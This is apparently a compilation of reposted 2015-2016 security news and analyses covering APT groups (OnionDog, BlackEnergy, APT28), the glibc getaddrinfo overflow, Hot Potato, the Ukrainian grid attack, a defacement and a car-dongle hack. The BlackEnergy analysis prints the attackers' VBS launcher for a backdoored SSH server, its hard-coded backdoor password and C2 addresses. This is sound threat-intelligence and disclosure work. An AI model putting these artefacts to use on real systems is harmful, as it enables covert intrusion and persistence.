OnionDog APT targets Critical Infrastructures and Industrial Control Systems (ICS)

The Helios Team at 360 SkyEye Labs revealed that a group named OnionDog has been infiltrating and stealing information from the energy, transportation and other infrastructure industries of Korean-language countries through the Internet.

OnionDog

OnionDog’s first activity can be traced back to October, 2013 and in the following two years it was only active between late July and early September. The self-set life cycle of a Trojan attack is 15 days on average and is distinctly organizational and objective-oriented.

OnionDog malware is transmitted by taking advantage of the vulnerability of the popular office software Hangul in Korean-language countries, and it attacked network-isolated targets through a USB worm.

Targeting the infrastructure industry

OnionDog concentrated its efforts on infrastructure industries in Korean-language countries. In 2015 this organization mainly attacked harbors, VTS, subways, public transportation and other transportation systems. In 2014 it attacked many electric power and water resources corporations as well as other energy enterprises.

The Helios Team has found 96 groups of malicious code, 14 C&C domain names and IP related to OnionDog. It first surfaced in October 2013, and then was most active in the summers of the following years. The Trojan set its own “active state” time and the shortest was be three days and maximum twenty nine days, from compilation to the end of activity. The average life cycle is 15 days, which makes it more difficult for the victim enterprises to notice and take actions than those active for longer period of time.

OnionDog’s attacks are mainly carried out in the form of spear phishing emails. The early Trojan used icons and file numbers to create a fake HWP file (Hangul’s file format). Later on, the Trojan used a vulnerability in an upgraded version of Hangul, which imbeds malicious code in a real HWP file. Once the file is opened, the vulnerability will be triggered to download and activate the Trojan.

Since most infrastructure industries, such as the energy industry, generally adopt intranet isolation measures, OnionDog uses the USB disk drive ferry to break the false sense of security of physical isolation. In the classic APT case of the Stuxnet virus, which broke into an Iranian nuclear power plant, the virus used an employee’s USB disk to circumvent network isolation. OnionDog also used this channel and generated USB worms to infiltrate the target internal network.

“OCD-type” intensive organization

In the Malicious Code activities of OnionDog, there are strict regulations:

First, the Malicious Code has strict naming rules starting from the path of created PDB (symbol file). For example, the path for USB worm is APT-USB, and the path for spear mail file is APT-WebServer;

When the OnionDog Trojan is successfully released, it will communicate to a C&C (Trojan server), download other malware and save them in the %temp% folder and use “XXX_YYY.jpg” uniformly as the file name. These names have their special meaning and usually point to the target.

All signs show that OnionDog has strict organization and arrangement across its attack time, target, vulnerability exploration and utilization, and malicious code. At the same time, it is very cautious about covering up its tracks.

In 2014, OnionDog used many fixed IPs in South Korea as its C&C sites. Of course, this does not mean that the attacker is located in South Korea. These IPs could be used as puppets and jumping boards. By 2015, OnionDog website communications were upgraded to Onion City across the board. This is so far a relatively more advanced and covert method of network communication among APT attacks.

Onion City means that the deep web searching engine uses Tor2web agent technology to visit the anonymous Tor network deeply without using the Onion Brower specifically. And OnionDog uses the Onion City to hide the Trojan-controlling server in the Tor network.

In recent years, APT attacks on infrastructure facilities and large-scale enterprises have frequently emerged. Some that attack an industrial control system, such as Stuxnet, Black Energy and so on, can have devastating results. Some attacks are for the purpose of stealing information, such as the Lazarus hacker organization jointly revealed by Kaspersky, AlienVault lab and Novetta, and OnionDog which was recently exposed by the 360 Helios team. These secret cybercrimes can cause similarly serious losses as well.

 

 

Credit:  helpnetsecurity

[CRITICAL] CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow

Have you ever been deep in the mines of debugging and suddenly realized that you were staring at something far more interesting than you were expecting? You are not alone! Recently a Google engineer noticed that their SSH client segfaulted every time they tried to connect to a specific host. That engineer filed a ticket to investigate the behavior and after an intense investigation we discovered the issue lay in glibc and not in SSH as we were expecting. Thanks to this engineer’s keen observation, we were able determine that the issue could result in remote code execution. We immediately began an in-depth analysis of the issue to determine whether it could be exploited, and possible fixes. We saw this as a challenge, and after some intense hacking sessions, we were able to craft a full working exploit!

In the course of our investigation, and to our surprise, we learned that the glibc maintainers had previously been alerted of the issue via their bug tracker in July, 2015. (bug). We couldn’t immediately tell whether the bug fix was underway, so we worked hard to make sure we understood the issue and then reached out to the glibc maintainers. To our delight, Florian Weimer and Carlos O’Donell of Red Hat had also been studying the bug’s impact, albeit completely independently! Due to the sensitive nature of the issue, the investigation, patch creation, and regression tests performed primarily by Florian and Carlos had continued “off-bug.”

This was an amazing coincidence, and thanks to their hard work and cooperation, we were able to translate both teams’ knowledge into a comprehensive patch and regression test to protect glibc users.

That patch is available here.

 

Issue Summary:

Our initial investigations showed that the issue affected all the versions of glibc since 2.9. You should definitely update if you are on an older version though. If the vulnerability is detected, machine owners may wish to take steps to mitigate the risk of an attack. The glibc DNS client side resolver is vulnerable to a stack-based buffer overflow when the getaddrinfo() library function is used. Software using this function may be exploited with attacker-controlled domain names, attacker-controlled DNS servers, or through a man-in-the-middle attack. Google has found some mitigations that may help prevent exploitation if you are not able to immediately patch your instance of glibc. The vulnerability relies on an oversized (2048+ bytes) UDP or TCP response, which is followed by another response that will overwrite the stack. Our suggested mitigation is to limit the response (i.e., via DNSMasq or similar programs) sizes accepted by the DNS resolver locally as well as to ensure that DNS queries are sent only to DNS servers which limit the response size for UDP responses with the truncation bit set.

 

Technical information:

glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated. Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow. The vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.

Exploitation:

Remote code execution is possible, but not straightforward. It requires bypassing the security mitigations present on the system, such as ASLR. We will not release our exploit code, but a non-weaponized Proof of Concept has been made available simultaneously with this blog post. With this Proof of Concept, you can verify if you are affected by this issue, and verify any mitigations you may wish to enact. As you can see in the below debugging session we are able to reliably control EIP/RIP.

(gdb) x/i $rip => 0x7fe156f0ccce <_nss_dns_gethostbyname4_r+398>: req (gdb) x/a $rsp 0x7fff56fd8a48: 0x4242424242424242 0x4242424242420042

When code crashes unexpectedly, it can be a sign of something much more significant than it appears; ignore crashes at your peril! Failed exploit indicators, due to ASLR, can range from:

  • Crash on free(ptr) where ptr is controlled by the attacker.
  • Crash on free(ptr) where ptr is semi-controlled by the attacker since ptr has to be a valid readable address.
  • Crash reading from memory pointed by a local overwritten variable.
  • Crash writing to memory on an attacker-controlled pointer.

We would like to thank Neel Mehta, Thomas Garnier, Gynvael Coldwind, Michael Schaller, Tom Payne, Michael Haro, Damian Menscher, Matt Brown, Yunhong Gu, Florian Weimer, Carlos O’Donell and the rest of the glibc team for their help figuring out all details about this bug, exploitation, and patch development.

 

 

Credit:  Fermin J. Serna and Kevin Stadmeyer

Another Door to Windows | Hot Potato exploit

Microsoft Windows versions 7, 8, 10, Server 2008 and Server 2012 vulnerable to Hot Potato exploit which gives total control of PC/laptop to hackers

Security researchers from Foxglove Security have discovered that almost all recent versions of Microsoft’s Windows operating system are vulnerable to a privilege escalation exploit. By chaining together a series of known Windows security flaws, researchers from Foxglove Security have discovered a way to break into PCs/systems/laptops running on Windows 7/8/8.1/10 and Windows Server 2008/2010.

The Foxglove researchers have named the exploit as Hot Potato. Hot Potato relies on three different types of attacks, some of which were discovered back at the start of the new millennium, in 2000. By chaining these together, hackers can remotely gain complete access to the PCs/laptops running on above versions of Windows.

Surprisingly, some of the exploits were found way back in 2000 but have still not been patched by Microsoft, with the explanation that by patching them, the company would effectively break compatibility between the different versions of their operating system.

Hot Potato

Hot Potato is a sum of three different security issues with Windows operating system. One of the flaw lies in local NBNS (NetBIOS Name Service) spoofing technique that’s 100% effective. Potential hackers can use this flaw to set up fake WPAD (Web Proxy Auto-Discovery Protocol) proxy servers, and an attack against the Windows NTLM (NT LAN Manager) authentication protocol.

Exploiting these exploits in a chained manner allows the hackers to gain access to the PC/laptop by elevating an application’s permissions from the lowest rank to system-level privileges, the Windows analog for a Linux/Android root user’s permissions.

Foxglove researchers created their exploit on top of a proof-of-concept code released by Google’s Project Zero team in 2014 and have presented their findings at the ShmooCon security conference over the past weekend.

They have also posted proof-of-concept videos on YouTube in which the researchers break Windows versions such as 7, 8, 10, Server 2008 and Server 2012.

You can also access the proof of concept on Foxglove’s GitHub page here.

Mitigation

The researchers said that using SMB (Server Message Block) signing may theoretically block the attack. Other method to stop the NTNL relay attack is by enabling “Extended Protection for Authentication” in Windows.

 

 

Credit:  Vijay Prabhu, techworm

BlackEnergy Attacking Ukraine’s Critical Infrastructures

The cybercriminal group behind BlackEnergy, the malware family that has been around since 2007 and has made a comeback in 2014 (see our previous blog posts on Back in BlackEnergy *: 2014 Targeted Attacks in Ukraine and Poland and BlackEnergy PowerPoint Campaigns, as well as ourVirus Bulletin talk on the subject), was also active in the year 2015.

ESET has recently discovered that the BlackEnergy trojan was recently used as a backdoor to deliver a destructive KillDisk component in attacks against Ukrainian news media companies and against the electrical power industry. In this blog, we provide details on the BlackEnergy samples ESET has detected in 2015, as well as the KillDisk components used in the attacks. Furthermore, we examine a previously unknown SSH backdoor that was also used as another channel of accessing the infected systems, in addition to BlackEnergy.

BlackEnergy evolution in 2015

Once activated, variants of BlackEnergy Lite allow a malware operator to check specific criteria in order to assess whether the infected computer truly belongs to the intended target. If that is the case, the dropper of a regular BlackEnergy variant is pushed to the system.

The BlackEnergy malware stores XML configuration data embedded in the binary of DLL payload.

Figure 1 – The BlackEnergy configuration example used in 2015

Figure 1 – The BlackEnergy configuration example used in 2015

Apart from a list of C&C servers, the BlackEnergy config contains a value called build_id. This value is a unique text string used to identify individual infections or infection attempts by the BlackEnergy malware operators. The combinations of letters and numbers used can sometimes reveal information about the campaign and targets.

Here is the list of Build ID values that we identified in 2015:

  • 2015en
  • khm10
  • khelm
  • 2015telsmi
  • 2015ts
  • 2015stb
  • kiev_o
  • brd2015
  • 11131526kbp
  • 02260517ee
  • 03150618aaa
  • 11131526trk

We can speculate that some of them have a special meaning. For example 2015telsmi could contain the Russian acronym SMI – Sredstva Massovoj Informacii, 2015en could mean Energy, and there’s also the obvious “Kiev”.

KillDisk component

In 2014 some variants of the BlackEnergy trojan contained a plugin designed for the destruction of the infected system, named dstr.

In 2015 the BlackEnergy group started to use a new destructive BlackEnergy component detected by ESET products as Win32/KillDisk.NBB, Win32/KillDisk.NBC and Win32/KillDisk.NBD trojan variants.

The main purpose of this component is to do damage to data stored on the computer: it overwrites documents with random data and makes the OS unbootable.

The first known case where the KillDisk component of BlackEnergy was used was documented by CERT-UA in November 2015. In that instance, a number of news media companies were attacked at the time of the 2015 Ukrainian local elections. The report claims that a large number of video materials and various documents were destroyed as a result of the attack.

It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions.

 

Figure 2 – A partial list of file extensions targeted for destruction by KillDisk.NBB

Figure 2 – A partial list of file extensions targeted for destruction by KillDisk.NBB

The KillDisk component used in attacks against energy companies in Ukraine was slightly different. Our analysis of the samples shows that the main changes made in the newest version are:

  • Now it accepts a command line argument, to set a specific time delay when the destructive payload should activate.
  • It also deletes Windows Event Logs : Application, Security, Setup, System.
  • It is less focused on deleting documents. Only 35 file extensions are targeted.
Figure 3 – A list of file extensions targeted for destruction by new variant of KillDisk component

Figure 3 – A list of file extensions targeted for destruction by new variant of KillDisk component

As well as being able to delete system files to make the system unbootable – functionality typical for such destructive trojans – the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems.

Once activated, this variant of the KillDisk component looks for and terminates two non-standard processes with the following names:

  • komut.exe
  • sec_service.exe

We didn’t manage to find any information regarding the name of the first process (komut.exe).

The second process name may belong to software called ASEM Ubiquity, a software platform that is often used in Industrial control systems (ICS), or to ELTIMA Serial to Ethernet Connector. In case the process is found, the malware does not just terminate it, but also overwrites the executable file with random data.

Backdoored SSH server

In addition to the malware families already mentioned, we have discovered an interesting sample used by the BlackEnergy group. During our investigation of one of the compromised servers we found an application that, at first glance, appeared to be a legitimate SSH server called Dropbear SSH.

In the order to run the SSH server, the attackers created a VBS file with the following content:

Set WshShell = CreateObject(“WScript.Shell”)
WshShell.CurrentDirectory = “C:\WINDOWS\TEMP\Dropbear\”
WshShell.Run “dropbear.exe -r rsa -d dss -a -p 6789″, 0, false

As is evident here, the SSH server will accept connections on port number 6789. By running SSH on the server in a compromised network, attackers can come back to the network whenever they want.

However, for some reason this was not enough for them. After detailed analysis we discovered that the binary of the SSH server actually contains a backdoor.

Figure 4 – Backdoored authentication function in SSH server

Figure 4 – Backdoored authentication function in SSH server

As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered. The same situation applies to authentication by key pair – the server contains a pre-defined constant public key and it allows authentication only if a particular private key is used.

Figure 5 – The embedded RSA public key in SSH server

Figure 5 – The embedded RSA public key in SSH server

ESET security solutions detect this threat as Win32/SSHBearDoor.A trojan.

Indicators of Compromise (IoC)

IP addresses of BlackEnergy C2-servers:
5.149.254.114
5.9.32.230
31.210.111.154
88.198.25.92
146.0.74.7
188.40.8.72

XLS document with malicious macro SHA-1:
AA67CA4FB712374F5301D1D2BAB0AC66107A4DF1

BlackEnergy Lite dropper SHA-1:
4C424D5C8CFEDF8D2164B9F833F7C631F94C5A4C

BlackEnergy Big dropper SHA-1:
896FCACFF6310BBE5335677E99E4C3D370F73D96

BlackEnergy drivers SHA-1:
069163E1FB606C6178E23066E0AC7B7F0E18506B
0B4BE96ADA3B54453BD37130087618EA90168D72
1A716BF5532C13FA0DC407D00ACDC4A457FA87CD
1A86F7EF10849DA7D36CA27D0C9B1D686768E177
1CBE4E22B034EE8EA8567E3F8EB9426B30D4AFFE
20901CC767055F29CA3B676550164A66F85E2A42
2C1260FD5CEAEF3B5CB11D702EDC4CDD1610C2ED
2D805BCA41AA0EB1FC7EC3BD944EFD7DBA686AE1
4BC2BBD1809C8B66EECD7C28AC319B948577DE7B
502BD7662A553397BBDCFA27B585D740A20C49FC
672F5F332A6303080D807200A7F258C8155C54AF
84248BC0AC1F2F42A41CFFFA70B21B347DDC70E9
A427B264C1BD2712D1178912753BAC051A7A2F6C
A9ACA6F541555619159640D3EBC570CDCDCE0A0D
B05E577E002C510E7AB11B996A1CD8FE8FDADA0C
BD87CF5B66E36506F1D6774FD40C2C92A196E278
BE319672A87D0DD1F055AD1221B6FFD8C226A6E2
C7E919622D6D8EA2491ED392A0F8457E4483EAE9
CD07036416B3A344A34F4571CE6A1DF3CBB5783F
D91E6BB091551E773B3933BE5985F91711D6AC3B
E1C2B28E6A35AEADB508C60A9D09AB7B1041AFB8
E40F0D402FDCBA6DD7467C1366D040B02A44628C
E5A2204F085C07250DA07D71CB4E48769328D7DC

KillDisk-components SHA-1:
16F44FAC7E8BC94ECCD7AD9692E6665EF540EEC4
8AD6F88C5813C2B4CD7ABAB1D6C056D95D6AC569
6D6BA221DA5B1AE1E910BBEAA07BD44AFF26A7C0
F3E41EB94C4D72A98CD743BBB02D248F510AD925

VBS/Agent.AD trojan SHA-1:
72D0B326410E1D0705281FDE83CB7C33C67BC8CA

Win32/SSHBearDoor.A trojan SHA-1:
166D71C63D0EB609C4F77499112965DB7D9A51BB

Credit: welivesecurity

Malware Found Inside Downed Ukrainian Grid Management Points to Cyber-attack

The Burshtyn TES power plant in Ivano-Frankivsk Oblast, Ukraine. It’s not clear if Burshtyn was affected, but power outages did affect the grid in the Ivano-Frankivsk Oblast region. Image: Raimond Spekking/Wikimedia Commons

Overview

On December 23, a Ukrainian power company announced that a section of the country had gone dark. This temporary outage was not the result of purely physical sabotage—like the case a month earlier where explosives had knocked out power lines to Crimea—but instead, according to Ukrainian officials, was due to a cyberattack.

The country’s SBU security service immediately castigated Russia for the outage, according to Reuters, and Ukraine started an official investigation into what exactly happened.

Over the past few days, more details around the attack have emerged, including an apparent sample of malware found in a network of the regional control center. If that malware was indeed responsible for causing a blackout throughout parts of Ukraine, it would be a signal that industrial control systems (ICS), and in particular electric grids, really are under threat from cyberattacks, something that researchers have been warning for years.

“It was easily recoverable, but obviously it’s a bad thing for the power to go out”

Around a week after the attack announcement, Robert M. Lee, a former US Air Force cyber warfare operations officer as well as the founder and CEO of Dragos Security, wrote on the SANS ICS Security Blog that his team had obtained a sample of the malware found within the affected network.

“The fact that malware was recovered from the network at all, and the fact that it’s newer, gives a high confidence assessment that the cyberattack on Ukraine was legitimate,” Lee told Motherboard in a phone interview. Lee said the malware was “unique,” implying that it likely wasn’t something that just happened be on the grid network during the outage.

“The malware is a 32 bit Windows executable and is modular in nature indicating that this is a module of a more complex piece of malware,” Lee wrote in his blog post, who passed the sample over to Kyle Wilhoit, a senior threat researcher at cybersecurity company Trend Micro. Wilhoit said that the malware had a wiping function that would impact the targeted system.

“The resolution of APIs that are not used elsewhere in the code probably means that some of the code was borrowed from another program,” wrote Jake Williams, founder of Rendition Security and a SANS instructor, to whom Lee also provided the malware. Williams added that the malware appears to have a code “base,” on which modules are then added.

Other pieces of malware have targeted industrial systems in the past: “Havex” has infected technology commonly used in process control systems, such as water pumps and turbines; and “BlackEnergy,” which has been used in straight-up cybercriminal campaigns, has also been used to hit energy engineering facilities.

An Associated Press investigation published in December last year found that “sophisticated foreign hackers” had gained enough access to control power plant networks around a dozen times in the last decade. More broadly, the Wall Street Journal recently revealed that Iranian hackers had breached a New York dam in 2013. At the latest Chaos Communication Congress, a security, politics and art conference in Hamburg, Germany, researchers warned of the serious vulnerabilities in automated railroad systems. All of those require varying degrees of sophistication, with some of them needing expert knowledge of the target network’s protocols and idiosyncrasies.

After Lee’s post, more researchers published their own findings. Analysts from ESET claimed that the malware found in Ukraine was actually the BlackEnergy malware. Others went a step further, and wrote that BlackEnergy has been found within other Ukrainian power companies during the week of Christmas last year.

One group that has made heavy use of the BlackEnergy malware, and has previously targeted power facilities and other ICS, is alleged Russian hacking group Sandworm. It would be easy to assume that, because of the target and presence of supposed BlackEnergy malware, that Sandworm was behind the attack.

But that’s a logical leap too far, at least with the currently available evidence.

“The BlackEnergy malware has been in existence since 2007 and lots of different actors have used it,” Lee told Motherboard.

“People are saying that this piece of malware is linked to BlackEnergy. I can buy that, and there is some good analysis to say that is likely true,” he added. “But just because the BlackEnergy malware was used, does not mean that it’s linked at all” to Sandworm.

Irrespective of who committed the attack, what appears to have happened is that hackers “caused a power outage that was temporary in nature. It was easily recoverable, but obviously it’s a bad thing for the power to go out,” Lee said. “It’s not trivial—it still takes getting on the system and exploiting all that—but it’s not hard.”

One possible explanation is that the attackers may have remotely accessed a digital control panel located within the control center’s system. Other researchers have pointed towards the data wiping feature of the malware; presumably, wiping out vital data could have a negative impact on the electric grid’s systems. At this point, both of those theories are largely speculative.

But while either of those approaches are relatively easy for a hacker to carry out, attacks that would cause much more impact—that lasted for say, weeks or months—are much less likely to occur.

“Taking down the power grid, or cascading failures, or weeks of impact: that is incredibly hard. People have oversold how easy that is to achieve,” Lee added.

Although experts say it is likely that the power outage in Ukraine was caused by an cyberattack, there are still plenty of questions to be answered. More news is sure to follow in the coming days or weeks, as several research teams now have access to the malware sample.

Correction 1/4/16: This story originally referred to systems being compromised in a power plant or plants on the affected grid. As Michael Toecker pointed out, local sources report it was a regional control center that was affected.

 

Malware Analysis

The SANS ICS team recently gained access to a sample of malware that came from the network of the Ukrainian site targeted in the cyber attack that led to a power outage. I want to offer a few caveats to this blog post up front.

 

  • First, this is all developing and the next few days and weeks will add clarity to the situation.
  • Second, with this type of analysis there’s not much that can be definitively stated in terms of attribution or impact. Take everything here as informative only.
  • Third, SANS ICS is not in the business of releasing highly detailed technical analysis of malware. The purpose of this blog is to focus on lessons learned and education for the community. Therefore, I am not going to be sharing the hash of the sample we have but instead talking about the takeaways. There are at least 3 major cybersecurity and threat intelligence vendors I am aware of that have the sample and will be releasing detailed analyses. I do not want us at SANS ICS to impede that by releasing the sample to the wider community right now. However, to any of the major players and researchers that want a sample feel free to reach out to us via the SANS ICS Alumni email distribution and we will provide it to verified sources.

Here I’ll detail the facts, speculation, and takeaways for the community.

The Facts

The SANS ICS team has been researching the cyber attack on the Ukrainian power grid since the event occurred with a mix of interest and a critical viewpoint. The interest was due to the seriousness of the event and the critical viewpoint was taken because while threats are active against ICS there are often otherwise good case-studies that get spun out of control by the media. The idea of a cyber attack on infrastructure that leads to an impact to operations is very serious in nature and must be handled with care, especially when there is geopolitical tension in an area such as Ukraine.

Through trusted contacts in the communitythe SANS ICS team came across a lot of amplifying information about the attack, how it could have occurred, and the seriousness of this incident to the Ukrainian government and the focus they are putting on the investigation that increases the credibility of their reporting. The SANS ICS team was also passed a sample of malware from trusted sources taken from the impacted network by responders in country.

The hash for the malware can also be found on VirusTotal where a user in Ukraine submitted the sample on the 23rd of December. The timing and unique nature of the sample adds some credibility to the sources that collected and passed us the sample of the malware.

The malware is a 32 bit Windows executable and is modular in nature indicating that this is a module of a more complex piece of malware. I passed the malware sample to Kyle Wilhoit, a Senior Threat Researcher at Trend Micro who has done great work in the ICS community before, who confirmed through static analysis that the malware itself has a wiping routine that would impact the infected system. After that I passed the sample to Jake Williams, founder of Rendition Security and a fellow SANS Instructor, who has been analyzing this incident as well for further support. Below is his analysis:


 

Note that this analysis is based on an extremely limited static analysis of the malware and further analysis may impact these findings. The code appears modular in nature. The attackers take steps to obscure some notable suspicious APIs (e.g. OpenSCManager) from the imports table, but not others (e.g. CreateToolhelp32Snapshot). The string “obfuscation” method is crude and obvious upon manual examination, but effective to thwart string matching. Any of these hyphen separated strings would make an excellent Yara rule.

malware-ukraine

Notably, the malware does not appear to use all of the functions it imports. Specifically, there are no cross references to service related calls. While this may be due to dynamic call targets, there are significant numbers of cross references to other dynamically resolved APIs (e.g. RegDeleteKey).

The resolution of APIs that are not used elsewhere in the code probably means that some of the code was borrowed from another program. This hints at a development shop with a code base from which to piece modules together. Although the string obfuscation was crude, it was sufficient for the task. The crude string obfuscation should not be taken as an indication that the attacks came from a non-state actor.

Another possible interesting note is the compile timestamp of the executable. It is set to January 6, 1999.

timestamp-ukraine

This was likely modified by the attackers, but whether this date is significant in historical context is unknown at this time. It may simply be a random modification.


 

There are at least 3 major cybersecurity vendors working on the piece of malware right now in their own analysis and I will simply state that I’m impressed with the quality of work from them I have seen so far. Additionally, folks at the ICS-CERT and E-ISAC are doing great analysis as well and will likely be pushing out information through government sharing channels soon. Simply put, a lot will be known about this in the community soon to further support the analysis or help move on to a better understanding.

The Speculation

It is not currently possible right now to state that the malware recovered caused the loss of power in Ukraine. Additionally, the wiping functionality of the module recovered is likely for the purposes of cleanup after the attack; it itself does not appear to have been capable of causing the outage. This is important to note as the wiping capability is not similar in nature to the Shamoon attack but instead an anti-forensics technique.

Also, it is possible that the incident caused responders to look at the network where they found the malware. The malware could be new and yet not be related to the incident. At this time I believe the malware is related to the incident though from analysis by the SANS ICS team and others around the community but this should be categorized as a low-confidence assessment currently.

There has also been speculation that the malware is related to, and potentially a module for, BlackEnergy2. The previous statement should not be taken as a standalone soundbite. There is very little to support this conclusion right now. If true though this would add credibility to Ukraine’s SBU who reported that the malware was launched by Russian security services. Because of the sources concluding the BlackEnergy2 connection I feel it is important to share the (potentially overstated) speculation with the community as there were many organizations around the global community who were impacted by that campaign. Just because a campaign is reported on publicly does not mean it is no longer active. Security personnel in ICS organizations should be actively looking for threats — the Ukrainian incident should not be seen as an incident that only impacts one site in a foreign country although no panic or alarm should be taken, only due diligence towards defense.

The Takeaways

  • There is a lot of great analysis going on in the community by a number of companies, government organizations, and individual researchers. Each have been contributing some unique aspects to the analysis. Defenders must always work together like this and build off of each other’s strengths. Information sharing in this manner is critical to security.
  • The Ukrainian power outage is more likely to have been caused by a cyber attack than previously thought. Early reporting was not conclusive but a sample of malware taken from the network bolsters the claims. The unique nature of the malware indicate some level of targeting may be possible but much more information is needed to confirm that targeting of ICS or this specific facility was intended.
    • If the malware does end up being related to the BlackEnergy2 campaign then this adds to the possibility that the facility and ICS was specifically targeted
    • Technical data alone is very rarely enough to conclude the intention of an adversary
  • ICS facilities around the world need to take an active defense approach to monitoring ICS networks and responding to threats. Additionally, each should have an ability, or at least contacts to request help from, to perform basic threat and malware analysis to know when to reach out for help to the larger community (my one plug: the identification of, response to, and analysis of threats is the type of skill set we teach in SANS ICS515 and I would encourage organizations to find this or similar type of training for security personnel onsite. Firewalls and boxes on the network alone will not protect an ICS fully).

This incident is an important case-study for the ICS community. If the analysis and follow on information is validated about the malware and attack then this will also be a significant event for the international community. The precedence that this event sets is far reaching past the security community and will need to be analyzed and understood fully. The response by countries to this type of attack and any attribution obtained will also be significant in establishing the precedence of these types of events moving forward in the international community.

 

 

 

Credit:  sans, motherboard

Pro-Palestinian Hackers Took over Radio Tel Aviv Website

A group of pro-Palestinian hackers took over the official website of Radio Tel Aviv (TLV) on Sunday and left a deface page on the homepage showing anti-Israeli messages.

A group of Palestinian-friendly hackers going with the handle of AnonCoders hacked and defaced the official website of Radio Tel Aviv.

Hackers left a deface page along with messages both in support of Palestine and against Israel and Zionism.

The Israeli newspaper YT News reports that the deface page uploaded by the group remained on the Radio Tel Aviv’s website for more than a day after it was removed by the site’s admin. However, the Radio transmission remained unharmed.

The message on the website described why the site was targeted:

“Because we are the voice of Palestine and we will not remain silent. And our main target is Zionism and Israhell, if you are asking why your website got hacked by us, it’s basically because we want to share our message.”

A full preview of the deface page is available below:

pro-palestinian-hackers-took-over-radio-tel-aviv-website

Link of targeted website along with its zone-h mirror as a proof of hack is available below:

http://102fm.co.il/
http://zone-h.org/mirror/id/24931127?zh=1

This is not the first time when pro-Palestinian hackers took over an Israeli entertainment service provider. In the past, the cyber wing of Hamas hacked the official TV broadcasts of Israeli Channel 2 and Channel 10 for a short period of time.

In 2013, Israel’s major traffic tunnel was hit by a massive cyber-attack, causing huge financial damage.

In March 2014, Al-Qassam hackers from Palestine compromised the IsraelDefense magazine database and its website, to launch SMS attack on Israeli journalists.

 

 

Credit: 

Researchers Hack Car via Insurance Dongle

Small devices installed in many automobiles allow remote attackers to hack into a car’s systems and take control of various functions, researchers have demonstrated.

 

Researchers at the University of California in San Diego analyzed commercial telematic control units (TCU) to determine if they are vulnerable to cyberattacks.

TCUs are embedded systems on board a vehicle that provide a wide range of functions. The products offered by carmakers, such as GM’s OnStar and Ford’s Sync, provide voice and data communications, navigation, and allow users to remotely control the infotainment systems and other features.

Aftermarket TCUs, which connect to the vehicle through the standard On-Board Diagnostics (OBD) port, can serve various purposes, including driving assistance, vehicle diagnostics, security, and fleet management. These devices are also used by insurance companies that offer safe driving and low mileage discounts, and pay-per-mile insurance.

Researchers have conducted tests on C4E dongles produced by France-based Mobile Devices. These TCUs, acquired by the experts from eBay, are used by San Francisco-based car insurance firm Metromile, which offers its per-mile insurance option to Uber.

Aftermarket TCUs are mostly used for data collection, but the OBD-II port they are connected to also provides access to the car’s internal networks, specifically the controller area network (CAN) buses that are used to connect individual systems and sensors.

“CAN is a multi-master bus and thus any device with a CAN transceiver is able to send messages as well as receive. This presents a key security problem since as we, and others, have shown, transmit access to the CAN bus is frequently sufficient to obtain arbitrary control over all key vehicular systems (including throttle and brakes),” researchers explained in their paper.

The experts have identified several vulnerabilities in the Mobile Devices product, including the lack of authentication for remotely accessible debug services, the use of hard-coded cryptographic keys (CVE-2015-2906) and hard-coded credentials (CVE-2015-2907), the use of SMS messages for remotely updating the dongle, and the lack of firmware update validation (CVE-2015-2908).

In their experiments, researchers managed to gain local access to the system via the device’s USB port, and remote access via the cellular data interface that provides Internet connectivity and via an SMS interface.

In a real-world demonstration, the experts hacked a Corvette fitted with a vulnerable device simply by sending it specially crafted SMS messages. By starting a reverse shell on the system, they managed to control the windshield wipers, and apply and disable brakes while the car was in motion. The experts said they could have also accessed various other features.

Corvette hacked via insurance dongle

The remote attacks only work if the attacker knows the IP address of the device or the phone number associated with the SIM card used for receiving SMS messages. However, researchers determined that Internet-accessible TCUs can be identified by searching the web for strings of words unique to their web interface, or by searching for information related to the Telnet and SSH servers. Thousands of potential TCUs were uncovered by experts using this method.

As for the the SIM phone numbers, researchers believe many of them are sequentially assigned, which means an attacker might be able to obtain the information by determining the phone number for one device.

Researchers have reported their findings to Mobile Devices, Metromile, and Uber. Wired reported that Mobile Devices developed a patch that has been distributed by Metromile and Uber to affected products.

Mobile Devices told the researchers and the CERT Coordination Center at Carnegie Mellon University that many of the vulnerabilities have been fixed in newer versions of the software, and claimed that the attack described by experts should only work on developer/debugging devices, not on production deployments.

However, researchers noted that they discovered the vulnerabilities on recent production devices and they had not found the newer versions of software that should patch the security holes.

This is not the first time someone has taken control of a car using insurance dongles. In January, a researcher demonstrated that a device from Progressive Insurance used in more than two million vehicles was plagued by vulnerabilities that could have been exploited to remotely unlock doors, start the car, and collect engine information.

White hat hackers demonstrated on several occasions this summer that connected cars can be hacked. Charlie Miller and Chris Valasek remotely hijacked a Jeep, ultimately forcing Fiat Chrysler to recall 1.4 million vehicles to update their software. Last week, researchers reported finding several vulnerabilities in Tesla Model S, but they applauded the carmaker for its security architecture.

In July, senators Ed Markey and Richard Blumenthal introduced new legislation, the Security and Privacy in Your Car (SPY Car) Act, in an effort to establish federal standards to secure cars and protect drivers’ privacy.

 

 

Credit:  Eduard Kovacs

Russian cyber group seen preparing to attack banks

A security firm is warning that a group of Russian hackers known for targeting military, government and media organizations is now preparing to attack banks in the U.S. and elsewhere.

The group’s preparations, which have included writing new malware, registering domain names similar to those of intended targets, and setting up command-and-control servers, were discovered by analysts from security firm Root9B.

The group has been active since at least 2007 and is known by various names including APT28 and Pawn Storm. Several security vendors believe it operates out of Russia and has possible ties to that country’s intelligence agencies.

The group’s primary malware tool is a backdoor program called Sednit or Sofacy that it delivers to victims through spear-phishing emails or drive-by downloads launched from compromised websites.

